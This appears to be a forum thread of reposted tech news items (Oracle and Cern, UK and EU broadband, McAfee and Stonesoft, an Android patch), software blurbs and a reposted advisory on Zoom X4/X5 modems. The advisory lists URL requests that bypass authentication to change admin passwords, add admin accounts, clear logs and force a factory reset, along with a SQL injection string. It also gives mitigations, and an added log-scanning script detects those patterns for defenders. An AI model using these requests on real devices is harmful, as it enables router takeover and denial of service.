Oracle has signed a deal with Cern to provide additional IT management tools for the research organisation's database and infrastructure systems. The company said that Cern would be using its Enterprise Manager 12c platform to manage its databases, application servers and web servers. In total, the platform will account for the management of some 3000 objects. Oracle said that the Enterprise Manager platform would be overseeing Cern research and infrastructure systems including data generated by the famous Large Hadron Collider facility. The deployment includes some 200 Oracle Database instances and another 200 WebLogic server instances as well as application servers. “As many of our databases are critical for the operation of the accelerators and experiments, reliability is essential,” said Tony Cass, Cern database services group leader. “Optimizing our Oracle infrastructure is also important since we have to support increasing amounts of data within fixed budgets.” Cern, which generates massive amounts of data with its research projects, has arisen in the enterprise IT space as a major consumer of both hardware and services. The company has shelled out contracts to firms to build and maintain its vast datacentres and computing facilities. For Oracle, the announcement marks yet another major deal for the company. Last month, the firm announced contracts to provide services for Microsoft and Salesforce.com, providing its database platform for use in the companies' respective cloud service offerings. Along with boosting the company's bottom line, the deals helped Oracle to set aside a pair of public feuds which had plagued the company. Source: V3.co.uk
-
This is an official news item. It seems normal and logical to me not to post serials / cracks. If anyone wants a serial / crack, search Google.
-
Or 2-3 years.
-
Buddy, this news item is from 3 years and 2 months ago.
-
The Scottish government has announced funding of £264m for the rollout of superfast broadband across the entire country, to ensure that 95 percent of homes and businesses can access high speed services by 2017. The project involves funding from BT to the tune of £106.7m as well as £50m from the Broadband Delivery UK (BDUK) project and £50.7m from local authorities. The Scottish government is putting up funding of £36.4m while the final £20.5m is from a European grant. This follows on from a £146m partnership announced earlier this year to bring superfast services to the remote Highlands and Islands area of Scotland. Deputy first minister for Scotland, Nicola Sturgeon, said the funding was a huge boost for the nation and would enable it to compete on a global stage. “Today's announcement signals the start of one of the most ambitious infrastructure projects in the whole of Europe. It will connect communities across rural and urban areas, providing a platform for future economic development and regeneration,” she said. "Next generation broadband enables businesses to compete on the international stage. It has the potential to transform the way in which we educate our children, provide health and social care and deliver our public services. It provides Scotland with a platform upon which we can build and sustain a world-class digital country.” Communications minister Ed Vaizey welcomed the news, claiming it is vital that the whole of the UK is able to benefit from superfast services. “The complex and remote landscape of much of Scotland makes this one of the largest and most challenging projects in the nationwide rollout of superfast broadband,” he said. “This contract, signed today, marks the beginning of a transformation of broadband services for the population of southern and mid Scotland. 
Together with the already agreed Highlands and Islands project, it will be instrumental in driving growth and boosting local economies throughout the country.” The investment comes amid criticism of the public funding setup for broadband in the UK, after the National Audit Office slammed the government for its handling of the rollout of broadband services, as the project is set to deliver its goals late and without sufficient competition to guarantee value for money. Scotland is hoping to market itself as a leading digital hub in the future, with the nation also touting its cool year-round climate as an ideal location for data centres by offering natural cooling, akin to nations such as Sweden that are now being favoured by web giants such as Facebook. Source: V3.co.uk
-
If you’re a web programmer, there are a number of tools on the market to enable you to code up your web pages as quickly as possible. Perhaps you prefer to code everything by hand, so an advanced text editor will suffice. Others will want to go further and Macromedia Dreamweaver is the choice with design professionals, enabling you to have a complete control over the pages that make up your web site. However, if you’re new to web design, you have two options: pay a professional to design your own site or simply do it yourself. Sadly there aren’t too many excellent WYSIWYG (what you see is what you get – meaning you simply have to drag and drop images and text on to an interface, much like a desktop publisher) applications on the PC. Strangely there has been a plethora of excellent WYSIWYG web editors on the Mac platform, with Apple’s iWeb, RapidWeaver and SandVox. These all use templates to enable you to simply drag your media content on to existing professional templates, so you can quickly design a professional web site. WYSIWYG Web Builder is a Windows equivalent of these applications, but with even more flexibility. It enables you to design from scratch or from one of the many supplied templates. You can drop in a number of Windows objects such as ActiveX code and also Flash media files and, when you’ve finished your design, test and then upload to your homepage. Download Link
-
Opera is a popular browser with some of the best support for standards. Opera 11 promises even faster web surfing, built in spell checker and HTML emails. The faster web browsing is thanks to a new rendering engine, this is the software used to create the web pages. It also claims to support web standards properly including the Acid3 test (click the link to see how your current browser fares). Acid3 is an extreme test, a more visible effect will be the support for web fonts. Most browsers can only use the fonts installed on the computer. Web designers often give the browser a list of fonts. The font they would actually like used, a similar but more common font and then let the browser choose its own serif or sans-serif font. Web fonts let the browser load the font from a website. Auto-update is one improvement we are pleased to see as it is a simpler process than having to download an installer. Opera 12 is a major upgrade with a host of new features. The primary changes are speed improvements, through hardware acceleration. Note that this is the Mac OS X version of the browser. Download Link
-
Description : Zoom X4 and X5 modems suffer from authentication bypass and remote SQL injection vulnerabilities.
Author : Kyle Lovett
Source : Zoom X4 / X5 SQL Injection / Authentication Bypass ? Packet Storm
Code :

Vulnerable Products-
Zoom X4 ADSL Modem and Router running Nucleus/4.3 UPnP/1.0Virata-EmWeb/R6_2_0 Server, all GS Firmware versions
Zoom X5 ADSL Modem and Router running Nucleus/4.3 UPnP/1.0Virata-EmWeb/R6_2_0 Server, all GS Firmware versions

Note: A similar vulnerability was reported several years ago on the Zoom X3 ADSL Modem using a SOAP API call. Many of these vulnerabilities affect X3 in the same manner, without needing to use a SOAP API.

===================================
Vulnerability-
When UPnP services and WAN http administrative access are enabled, authorization and credential challenges can be bypassed by directly accessing root privileged abilities via a web browser URL. All aspects of the modem/router can be changed, altered and controlled by an attacker, including gaining access to and changing the PPPoe/PPP ISP credentials.
====================================
Timeline with Vendor-
Have had no response from Zoom Telephonics since first reporting the problem on June 28. Subsequent emails have been sent with no response.

Root Cause Observed-
-As in most IGD UPnP routers and modems, where root vulnerabilities are prevalent, these modems contain the same privileged tunnel between either side of the router to be traversed without authentication. The code and layout of the device plays a large role as well.

Code/Script Vulnerabilities-
-Form tags and action ids usually hidden are easily seen from the html source, no sanitization of client side input is occurring and root overrides such as 'Zadv=1' can be invoked by any user.
-No cookie authentication is done once several of the first bypass is executed, allowing for "Cookie: sessionId=invalid" to pass admin commands.
-The SQL injection UNION SELECT 1,2,3,4,5,6,7-- added to the end of any URL page calling a table value, such as /MainPage?id=25, will bring up the system status page, with each interface visible and selectable.

Patches or Fixes-
At this time, there are no known patches or fixes.

Vulnerability proofs and examples-
All administrative items can be accessed through these two URLs
-Menu Banner
http://<IP>/hag/pages/toc.htm
-Advanced Options Menu
http://<IP>/hag/pages/toolbox.htm

Example commands that can be executed remotely through a web browser URL, or a modified HTTP GET/POST request-
-Change Password for admin Account
On Firmware 2.5 or lower
http://<IP>/hag/emweb/PopOutUserModify.htm/FormOne&user=admin&ex_param1=admin&new_pass1=123456&new_pass2=123456&id=3&cmdSubmit=Save+Changes
On Firmware 3.0-
http://<IP>/hag/emweb/PopOutUserModify.htm?id=40&user=admin&Zadv=1&ex_param1=admin&new_pass1=123456&new_pass2=123456&id=3&cmdSubmit=Save+Changes
-Clear Logs
http://<IP>/Action?id=76&cmdClear+Log=Clear+Log
-Remote Reboot to Default Factory Settings-
Warning - For all intents and purposes, this action will almost always result in a long term Denial of Service attack.
http://<IP>/Action?reboot_loc=1&id=5&cmdReboot=Reboot
-Create New Admin or Intermediate Account-
On Firmware 2.5 or lower
http://<IP>/hag/emweb/PopOutUserAdd.htm?id=70&user_id="newintermediateaccount"&priv=v2&pass1="123456"&pass2="123456"&cmdSubmit=Save+Changes
On Firmware 3.0-
http://<IP>/hag/emweb/PopOutUserAdd.htm?id=70&Zadv=1&ex_param1=adminuser_id="newadminaccount"&priv=v1&pass1="123456"&pass2="123456"&cmdSubmit=Save+Changes

Mitigation and Workarounds-
Adv.Options --> UPnP --> Disable UPnP --> Write Settings to Flash --> Reboot
Adv.Options --> Firewall Configuration --> Enable 'Attack Protection', 'DOS Protection', 'Black List' --> Write Settings to Flash
Adv.Options --> Management Control --> Disable WAN Management from all fields --> Write Settings to Flash
Always change the default Username and Password, though this will not help mitigate this vulnerability.
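Defender-side triage for the indicators in the advisory above, as an added example that is not part of the advisory or of any vendor code: it scans constructed access-log lines (a hypothetical layout, Common Log Format with the request's Cookie header as a last quoted field) for the 'Zadv=1' override, the invalid sessionId cookie on administrative pages, the UNION SELECT injection and the destructive /Action commands.

```python
"""Triage access-log lines for the request patterns named in the Zoom X4/X5
advisory: the 'Zadv=1' privilege override, an invalid sessionId cookie on
administrative pages, the UNION SELECT injection and destructive /Action
commands. Added example; not part of the advisory or of any vendor code."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Hypothetical log layout (constructed for this example): Common Log Format
# with the request's Cookie header appended as a final quoted field.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<cookie>[^"]*)"$'
)

# Administrative entry points listed in the advisory.
ADMIN_PREFIXES = (
    "/hag/pages/toc.htm",
    "/hag/pages/toolbox.htm",
    "/hag/emweb/PopOutUserModify.htm",
    "/hag/emweb/PopOutUserAdd.htm",
    "/Action",
)
UNION_RE = re.compile(r"union\s+(all\s+)?select", re.IGNORECASE)

# Constructed sample: one client walking through the advisory's steps,
# followed by an unremarkable request from another client.
SAMPLE_LOG = """\
203.0.113.9 - - [10/Jul/2013:10:01:02 +0000] "GET /hag/pages/toc.htm HTTP/1.1" 200 5120 "sessionId=invalid"
203.0.113.9 - - [10/Jul/2013:10:01:05 +0000] "GET /hag/emweb/PopOutUserModify.htm?id=40&user=admin&Zadv=1&ex_param1=admin&new_pass1=123456&new_pass2=123456&id=3&cmdSubmit=Save+Changes HTTP/1.1" 200 880 "sessionId=invalid"
203.0.113.9 - - [10/Jul/2013:10:01:09 +0000] "GET /MainPage?id=25%20UNION%20SELECT%201,2,3,4,5,6,7-- HTTP/1.1" 200 9001 "-"
203.0.113.9 - - [10/Jul/2013:10:01:15 +0000] "GET /Action?reboot_loc=1&id=5&cmdReboot=Reboot HTTP/1.1" 200 120 "sessionId=invalid"
192.0.2.44 - - [10/Jul/2013:10:02:00 +0000] "GET /index.htm HTTP/1.1" 200 2048 "sessionId=9f3a2c"
"""


def parse_line(line):
    """Split one log line into its fields; return None for unparsable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = unquote(parts.path)
    rec["query"] = unquote(parts.query)
    rec["params"] = parse_qs(parts.query)
    return rec


def classify(rec):
    """Return the list of advisory patterns a parsed request matches."""
    reasons = []
    path = rec["path"]
    is_admin = path.startswith(ADMIN_PREFIXES)
    if is_admin:
        reasons.append("admin-path")
    # Root override parameter that the advisory says any user may pass.
    if rec["params"].get("Zadv") == ["1"]:
        reasons.append("zadv-override")
    # Admin page served with the literal 'sessionId=invalid' cookie.
    if is_admin and "sessionId=invalid" in rec["cookie"]:
        reasons.append("invalid-session-cookie")
    # UNION SELECT appended to a page that takes a table id (e.g. /MainPage?id=).
    if UNION_RE.search(rec["query"]) or UNION_RE.search(path):
        reasons.append("sql-injection")
    # Log clearing and factory reboot through /Action (denial of service).
    if path == "/Action" and any(
        k.startswith(("cmdReboot", "cmdClear")) for k in rec["params"]
    ):
        reasons.append("destructive-action")
    return reasons


def scan(log_text):
    """Return one finding per suspicious line: client, path and matched patterns."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = classify(rec)
        if reasons:
            findings.append({"ip": rec["ip"], "path": rec["path"], "reasons": reasons})
    return findings


def clients_to_review(findings):
    """Group matched patterns by client address for follow-up."""
    by_ip = {}
    for f in findings:
        by_ip.setdefault(f["ip"], set()).update(f["reasons"])
    return by_ip


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ip"], f["path"], ", ".join(f["reasons"]))
```

Because the advisory says WAN management should be disabled, any hit on these paths from a non-LAN address is worth reviewing even before the patterns match.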
-
European citizens are showing an increasing demand for high-speed broadband services, as almost half say they would switch to higher speed services when they are made available. Research of almost 30,000 citizens by the European Commission (EC) found that 45 percent of households would be willing to upgrade or switch suppliers if it meant they would receive faster internet connections. This is a marked increase on the same findings in 2012 when only 14 percent of citizens surveyed said they would be willing to pay more to upgrade. Vice president for the Digital Agenda, Neelie Kroes, said the result should act as an incentive for internet service providers to continue to boost the speeds of their networks to capitalise on this pent-up demand. "Consumers increasingly care about their internet being fast enough to watch videos, for example. And for those who run businesses from their home, speed is also a competitiveness issue,” she said. “Consumers now focus on both speed and price when making their choices.” The findings come after a recent report found that the average speed on offer in the EU is 19Mbps. While this is fairly impressive, it is some way short of the 30Mbps for all by 2013 pledge made by the EC as part of its commitment to boosting the digital infrastructure of the region. Other issues thrown up by the survey found that video blocks on sites like YouTube are the most annoying copyright issue for web users, while one third of those questioned use VoIP services like Skype to make calls over their internet connections. Another area of interest, which Kroes was quick to seize on to further her single market telecoms agenda, was the fact that 54 percent of households limit their national and international mobile phone calls because of concerns about cost. "This is the smartphone era, where high-quality mobile services are an essential part of daily life. 
It’s not acceptable for half the population to be limiting their phone calls because of cost issues, and it’s not acceptable that the lack of a connected single market encourages those limitations,” Kroes said. Kroes can take some solace in the fact, though, that the 2013 survey saw an 11 percent drop, from 60 percent to 49 percent, in the numbers of people worried about the cost of calls to networks other than their own domestic networks. This suggests the EC's efforts to reduce mobile termination rates are having a positive impact, but no doubt Kroes will be keen to see her next set of proposals through to improve this for next year's report. Source: V3.co.uk
-
McAfee has finalised its deal to acquire Stonesoft, announcing plans to offer advanced next-generation firewall technology acquired as part of the deal to its customers. The deal was announced in May when McAfee paid $389m to buy the Finnish firm. Now the deal has completed the Stonesoft team will become a part of the McAfee Network Security Business Unit led by Pat Calhoun. Stonesoft regional director, Ashish Patel, told V3 the deal is designed to offer businesses next-generation protection against the sea of evolved targeted attacks facing them. "Before next generation firewall technology came to market firewalling was quite a point product - so you had your firewall technology then you had your AV added onto that and so on," he said. "The next generation firewall technology is about bringing all of that together to deal with advanced threats. The threats we see on a daily basis are evolving and rapidly becoming much more complex and fluid in the way they attack. It can be quite difficult for companies to maintain the level of security they need to protect their businesses. That's where firewalling and intrusion prevention systems come into place." Patel said the upgraded tech will vastly bolster McAfee's existing firewall portfolio, boasting it will be a key tool in the firm's network security expansion strategy. "McAfee does have firewall technology but it's proxy based, this is obviously a next generation Firewall that they've taken on board. One of the key reasons to take on the technologies is to ensure McAfee itself holds a competitive advantage in the network security space, adding to the portfolio," he told V3. Patel added that Stonesoft will continue to support its existing 6,500 customers and will honour its forecast update and strategy announcements. Network security is forecast to be a boom area in the security industry. 
Gartner estimates that the market will boast a seven percent compound annual growth rate (CAGR) over the next five years and be worth $11.4bn by 2017. McAfee is one of many companies expanding its technology portfolio to deal with the recent influx of targeted attacks hitting businesses. Most recently competing security firm MalwareBytes acquired US firm Zero Vulnerability Labs, adding its flagship ExploitShield browser protection service to its anti-hacker arsenal. Source: V3.co.uk
-
Google has released an emergency fix plugging a security vulnerability that was affecting 99 percent of all Android devices. A Google spokesman confirmed to V3 the company has released the patch to core partners and OEMs, but added the firm is yet to see any evidence suggesting the flaw has been actively exploited by cyber criminals. Even with the patch fix released, it will still remain up to manufacturers and partner companies to roll it out to the general public. In the past companies have been slow to release updates to Android. The vulnerability was originally reported by security firm Bluebox and reportedly affects every version of Android since 1.6 and could be used to target any Google phone or tablet released in the last four years. Bluebox security chief technology officer Jeff Forristal said the flaw relates to the cryptographic signature of Android apps. Theoretically if exploited the flaw could allow hackers to turn legitimate applications into defence-dodging Trojans. This is largely due to the fact most companies, like Samsung, Sony and HTC have chosen to customise the Android version used on their devices which need to be optimised for each new version of the OS released by Google. The slow update cycle means that in the past older versions of Android, like Gingerbread have been the most commonly used. It was only this month that Google's latest Jelly Bean Android version overtook Gingerbread to become the most common version of the OS. Security experts have highlighted the slow update cycle as causing numerous problems outside of the Master Key issue reported by Bluebox. Most recently experts from Trend Micro and Kaspersky said even with the release Android's fragmented nature makes it difficult to fully secure the operating system, making it laborious and costly for security firms to fully support all Android versions. Source: V3.co.uk
-
- 1
-
The government’s 'digital by default' strategy has come under fire for lacking clear insights into the supposed cost savings it is delivering, and there are major security concerns it could open up networks to attack and put public data at risk. The issues were raised by the Science and Technology Committee in response to answers given by Cabinet Office minister Francis Maude on 17 June. In response to his statements, and those of other witnesses, the chair of the Science and Technology Committee Andrew Miller raised several issues. The most worrying issue was raised around security. Miller wrote that evidence given by the vice president of the Royal Academy of Engineering, Martyn Thomas, concerned the committee the government was leaving itself open to attack due to the policy it is pursuing. “We are concerned that inadequacies in government software may lead to security vulnerabilities. The committee would like to know whether the government is confident that software developed meets the highest engineering standards,” he wrote in the letter to Maude. Miller added that Martyn had also raised the point that the government could be “importing the security vulnerabilities of authorised ID assurance providers into their online services”. He added that “sensitive personally identifiable data could be compromised” as a result, and he urged the government to do more to ensure citizens trust the government with their personal data. “It appears that the public are unable to ascertain whether online government services are developed adequately to withstand cyber attacks. The committee suggests that the government should be clearer with the public about this," he said. Secondly, on the issue of cost savings, Miller said it was “surprising” that Maude had said it was hard to ascertain exactly how much was being saved by moving government transactions online, given the fact savings had been a key part of the strategy outlined by government.
“A key justification of the strategy is savings to the taxpayer. It is not evident to the committee that the Government has a handle on measuring these savings,” he wrote in a letter to Maude. “We welcome your message that savings are being made but urge the government to be clearer about the detail of both savings being made as services become digital by default, as well as the costs of designing, or redesigning, the services.” A Cabinet Office spokesperson told V3 it would respond formally to the concerns in due course but was confident the project was both delivering value for money and was secure. “We have ensured that privacy and security are designed in to our Identity Assurance programme by working with experts, industry and government departments to develop the service,” the spokesperson said. “It will be based on published standards of security and information assurance, and identity providers will have to be certified as meeting these standards.” The Cabinet Office has said in the past that it has saved £10bn from cutbacks including reducing its IT estate and renegotiating contracts. Source: V3.co.uk